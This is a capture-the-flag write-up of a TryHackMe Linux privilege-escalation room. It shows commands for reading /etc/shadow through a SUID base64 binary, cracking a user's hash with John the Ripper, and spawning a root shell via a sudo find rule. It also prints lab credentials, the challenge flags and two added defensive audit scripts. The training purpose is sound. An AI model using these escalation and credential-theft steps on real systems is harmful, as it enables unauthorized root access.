Link: https://tryhackme.com/room/linprivesc
The Privilege Escalation room covered a wide variety of privilege escalation techniques on a Linux server.
The main ones covered in this room are:
- SUDO access
- SUID bit
- Cron jobs
- NFS shares
- PATH
- Kernel exploits
- Capabilities
For the capstone challenge we are given the target details and asked to find two flags.
Problem Description
You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
You can access the target machine over your browser or use the SSH credentials below.
Username: leonard Password: Penny123
Reconnaissance
Let's log in to the target as the `leonard` user.
Sudo access check
```
[leonard@ip-10-10-19-185 ~]$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for leonard:
Sorry, user leonard may not run sudo on ip-10-10-19-185.
```
Result: No sudo access
Cron jobs check
```
[leonard@ip-10-10-19-185 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
```
Result: No cron jobs present to exploit
NFS exports check
```
[leonard@ip-10-10-19-185 ~]$ cat /etc/exports
[leonard@ip-10-10-19-185 ~]$
```
Result: No NFS shares
SUID bit check
```
[leonard@ip-10-10-19-185 ~]$ find / -type f -perm -04000 -ls 2>/dev/null | cut -d '/' -f 1,2,3,4
/usr/bin/base64
/usr/bin/ksu
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chage
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/Xorg
/usr/bin/mount
/usr/bin/umount
/usr/bin/crontab
/usr/bin/pkexec
/usr/bin/at
/usr/bin/sudo
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1
/usr/libexec/kde4
/usr/libexec/dbus-1
/usr/libexec/spice-gtk-x86_64
/usr/libexec/qemu-bridge-helper
/usr/libexec/sssd
/usr/libexec/sssd
/usr/libexec/sssd
/usr/libexec/sssd
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
/usr/libexec/flatpak-bwrap
```
Result: We have a handful of binaries with the SUID bit set (the `cut` truncates paths to four components, which is why `/usr/libexec/sssd` appears several times). Most of these are standard on a CentOS install; `base64` is the one that stands out. Let's see where the flags could be.
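From the defender's side, the same `find` listing is the input to a baseline check: anything setuid that a clean reference image does not ship (here, `base64`) or that is writable by others deserves a ticket. The following is an added example, not part of the writeup; the sample `find -ls` lines and the `EXPECTED_SUID` baseline are constructed assumptions and should be generated from a reference install of the same distro.

```python
"""Audit a captured `find / -type f -perm -04000 -ls` listing against a SUID baseline."""
import re

# Constructed sample of `find -ls` output (inode blocks mode links owner group size
# month day year/time path); not taken from the target machine.
SAMPLE_LS = """\
 1050  40 -rwsr-xr-x 1 root root  37488 Aug 20  2019 /usr/bin/base64
 1051  28 -rwsr-xr-x 1 root root  27856 Aug 20  2019 /usr/bin/passwd
 1052  32 -rwsr-xr-x 1 root root  32184 Aug 20  2019 /usr/bin/su
 1053  44 -rwsr-xr-x 1 root root  44264 Aug 20  2019 /usr/bin/mount
 1054  32 -rwsr-xr-x 1 root root  31984 Aug 20  2019 /usr/bin/umount
 1055 148 ---s--x--x 1 root root 147336 Aug 20  2019 /usr/bin/sudo
 1056  20 -rwsr-xrwx 1 root root  19256 Aug 20  2019 /opt/tools/helper
"""

# Assumption: the setuid binaries an administrator expects on this host.
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
                 "/usr/bin/umount", "/usr/bin/sudo"}

# mode may carry a trailing '.' on SELinux systems, hence the optional dot.
LS_LINE = re.compile(r"^\s*\d+\s+\d+\s+(\S{10})\.?\s+\d+\s+(\S+)\s+\S+\s+\d+"
                     r"\s+\S+\s+\d+\s+\S+\s+(/\S+)")


def parse_ls(listing):
    """Yield (mode, owner, path) for every line that looks like `find -ls` output."""
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)


def audit_suid(listing, expected=EXPECTED_SUID):
    """Return {path: [reasons]} for setuid files an administrator should review."""
    findings = {}
    for mode, owner, path in parse_ls(listing):
        if mode[3] not in "sS":          # owner-execute slot must carry the setuid bit
            continue
        reasons = []
        if path not in expected:
            reasons.append("not in baseline")
        if mode[5] == "w" or mode[8] == "w":
            reasons.append("group/world writable setuid file")
        if owner != "root":
            reasons.append(f"setuid to non-root user {owner}")
        if reasons:
            findings[path] = reasons
    return findings
```

Run it against the real output by piping `find / -type f -perm -04000 -ls 2>/dev/null` into `audit_suid`; an empty result means nothing deviates from the baseline.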
Home Directories Listing
```
[leonard@ip-10-10-19-185 ~]$ ls /home/
leonard missy rootflag
[leonard@ip-10-10-19-185 ~]$ ls /home/*
/home/leonard:
perl5
ls: cannot open directory /home/missy: Permission denied
ls: cannot open directory /home/rootflag: Permission denied
```
So there are three directories under /home, but only leonard's is accessible; we have no permission on the home directories of missy and rootflag.
Let's look at /etc/passwd to confirm which users exist on the system.
```
$ cat /etc/passwd
tcpdump:x:72:72::/:/sbin/nologin
leonard:x:1000:1000:leonard:/home/leonard:/bin/bash
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/mqueue/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
missy:x:1001:1001::/home/missy:/bin/bash
```
The passwd file shows that, besides leonard, only the user missy has a login shell; there is no user named rootflag.
So the next step is to get into the missy account and look for privilege escalation possibilities from there.
---
Cracking Shadow file
To crack the credentials of Missy, we need the hashed password of the user from shadow file. To read the shadow file, let's use one of the applications with SUID bit set.
Link: https://gtfobins.github.io/gtfobins/base64/
base64 with the SUID bit set can read any privileged file, so let's grab the contents of /etc/shadow:
```
LFILE=/etc/shadow
./base64 "$LFILE" | base64 --decode
```
Now copy the entry for missy in both /etc/passwd and /etc/shadow file.
```
passwd -> missy:x:1001:1001::/home/missy:/bin/bash
shadow -> missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
```
John the Ripper
The unshadow tool combines the passwd and shadow files so John can use them.
```
unshadow pass.txt shad.txt > crack.txt
```
Let's unleash John the Ripper to crack the hash.
```
$ john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1 (missy)
```
Now we have the password for the user missy: Password1
Let's login as missy and do the reconnaissance again for privilege escalation possibilities.
```
[missy@ip-10-10-19-185 ~]$ sudo su -
[sudo] password for missy:
Sorry, user missy is not allowed to execute '/bin/su -' as root on ip-10-10-19-185.
[missy@ip-10-10-19-185 ~]$ sudo -l
Matching Defaults entries for missy on ip-10-10-19-185:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User missy may run the following commands on ip-10-10-19-185:
    (ALL) NOPASSWD: /usr/bin/find
[missy@ip-10-10-19-185 ~]$ cat /etc/exports
[missy@ip-10-10-19-185 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
```
Results:
- No full sudo access
- Sudo is allowed only for the /usr/bin/find command, without a password
- No NFS shares
- No cron jobs
Privilege Escalation using Find
We can escalate our privileges using Find if our user has sudo access to it.
Link: https://gtfobins.github.io/gtfobins/find/
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
```
sudo find . -exec /bin/sh \; -quit
```
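The sudoers rule is the root cause here: granting `find` (which runs arbitrary commands via `-exec`) with NOPASSWD is equivalent to granting root. A defender can catch such rules by parsing `sudo -l` output per user, as in this added example (not part of the writeup or of GTFOBins). The sample output and the `SHELL_CAPABLE` starter list are assumptions; extend the list from GTFOBins for your environment.

```python
"""Audit captured `sudo -l` output for rules that are root-equivalent in practice."""
import re

# Constructed sample modelled on the `sudo -l` output above; not copied from the target.
SAMPLE_SUDO_L = """\
Matching Defaults entries for missy on host:
    !visiblepw, always_set_home, env_reset, secure_path=/sbin:/bin:/usr/sbin:/usr/bin

User missy may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl restart httpd
    (ALL : ALL) ALL
"""

# Assumption: starter list of binaries whose sudo grant is root-equivalent because they
# execute arbitrary commands (find -exec) or read any file (base64). Extend from GTFOBins.
SHELL_CAPABLE = {"/usr/bin/find", "/usr/bin/base64"}

# "(runas) TAG: TAG: command" as printed by sudo -l
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:\w+:\s*)*)(.+)$")


def parse_sudo_l(text):
    """Return [(runas, tags, command)] from the 'may run the following commands' section."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if m:
            tags = {t.strip() for t in m.group(2).split(":") if t.strip()}
            rules.append((m.group(1).strip(), tags, m.group(3).strip()))
    return rules


def risky_rules(rules, shell_capable=SHELL_CAPABLE):
    """Return [(command, reason)] for rules that hand out root; NOPASSWD is noted."""
    findings = []
    for runas, tags, command in rules:
        binary = command.split()[0]
        reason = None
        if command == "ALL":
            reason = "unrestricted sudo"
        elif binary in shell_capable:
            reason = f"{binary} can run commands or read files as ({runas})"
        if reason:
            if "NOPASSWD" in tags:
                reason += " without a password"
            findings.append((command, reason))
    return findings
```

The remediation for a flagged rule is to remove it or narrow it to a wrapper script that takes no user-controlled arguments; a rule like `(root) /usr/bin/systemctl restart httpd` is the shape to aim for.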
So using that, I managed to escalate my privileges and found the flags.
```
[missy@ip-10-10-19-185 ~]$ sudo find . -exec /bin/sh \; -quit
sh-4.2# whoami
root
sh-4.2# bash
[root@ip-10-10-19-185 missy]# ls /home/rootflag/
flag2.txt
[root@ip-10-10-19-185 missy]# cat /home/rootflag/flag2.txt
THM-168824782390238
[root@ip-10-10-19-185 missy]# find / -type f -name flag1.txt
/home/missy/Documents/flag1.txt
[root@ip-10-10-19-185 missy]# cat /home/missy/Documents/flag1.txt
THM-42828719920544
[root@ip-10-10-19-185 missy]#
```
Summary
The Linux privilege escalation capstone challenge is a simple and interesting exercise.
It helped me to review thoroughly all the possible opportunities to elevate our privileges on a target system. I also learned many new things in this room, such as exploitation using SUID, sudo, PATH, cron jobs, NFS, etc.